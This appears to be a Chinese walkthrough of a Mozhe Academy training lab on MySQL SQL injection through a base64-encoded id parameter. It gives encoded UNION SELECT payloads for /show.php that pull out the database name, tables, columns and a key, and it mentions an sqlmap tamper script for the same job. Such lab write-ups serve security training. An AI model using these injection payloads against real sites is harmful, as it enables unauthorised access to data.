【墨者学院】:SQL注入实战(MySQL)


0x00.题目描述:

背景介绍

网站维护人员在WEB目录中放了一个可能存在漏洞的页面。

安全工程师“墨者”负责对该页面进行安全测试,看是否存在安全漏洞影响网站及服务器的运行。

实训目标

1、了解并熟练使用手工SQL注入;

2、了解MySQL的相关知识;

3、了解SQLMAP的使用及其tamper插件的使用;

4、了解base64编码及解码。

解题方向

参数通过base64编码后传输,然后根据相关提示进行测试。

0x01.解题思路:

靶场环境:


主界面

手工注入:

将主界面用burpsuite拦截下来,做测试用。


可以看到,id后面的参数为MQo=,使用了base64编码,解码得到id的值为1,使用or 1=1测试可行,可知这是一个注入点。

后续的注入都需要将URL先进行base64编码,其余的和数字注入并无区别。

爆数据库名payload:/show.php?id=MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGRhdGFiYXNlKCkKCQk=


爆数据库名    

爆数据库表名payload:/show.php?id=MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSd0ZXN0JwoJCQ==


爆数据库表名

爆列名payload:/show.php?id=MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9J3Rlc3QnIGFuZCB0YWJsZV9uYW1lPSdkYXRhJwoJCQ==


爆数据库列名

爆字段payload:MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGdyb3VwX2NvbmNhdCh0aGVrZXkpIGZyb20gZGF0YQoJCQ==


爆字段

拿到key

sqlmap注入:

sqlmap的话,加个base64encode脚本跑一跑就可以。

0x02.总结:

1.和数字型注入差不多,就是将注入语句先用base64编码进行转码。

你可能感兴趣的:(【墨者学院】:SQL注入实战(MySQL))